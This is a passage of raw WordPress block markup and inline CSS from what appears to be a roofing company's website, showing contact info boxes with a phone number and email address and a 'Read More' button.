rgba(255, 255, 255, 0.2); }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"3f3409af-10de-4bfb-a401-d63abd88d5a8\"} -->\n<style type=\"text/css\"> .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-3f3409af-10de-4bfb-a401-d63abd88d5a8 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"7a9bd093-61fd-4461-ab61-5fdfe90ebaf2\"} -->\n<style type=\"text/css\"> .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"744c4272-12fe-4eab-a56a-52601a4ce53f\"} -->\n<style type=\"text/css\"> .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000&nbsp;</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"877b3099-59ef-4060-8f90-6cc25a54ff76\"} -->\n<style type=\"text/css\"> .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-877b3099-59ef-4060-8f90-6cc25a54ff76\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"9e8d4684-2921-4739-9ff7-fab97cf7d308\"} -->\n<style type=\"text/css\"> .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"bf607241-86b3-436c-b825-588f4943f62b\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-bf607241-86b3-436c-b825-588f4943f62b skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ec57e435-714e-4975-952b-ed92e27ed276\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-ec57e435-714e-4975-952b-ed92e27ed276 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec57e435-714e-4975-952b-ed92e27ed276.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec57e435-714e-4975-952b-ed92e27ed276.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec57e435-714e-4975-952b-ed92e27ed276.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; 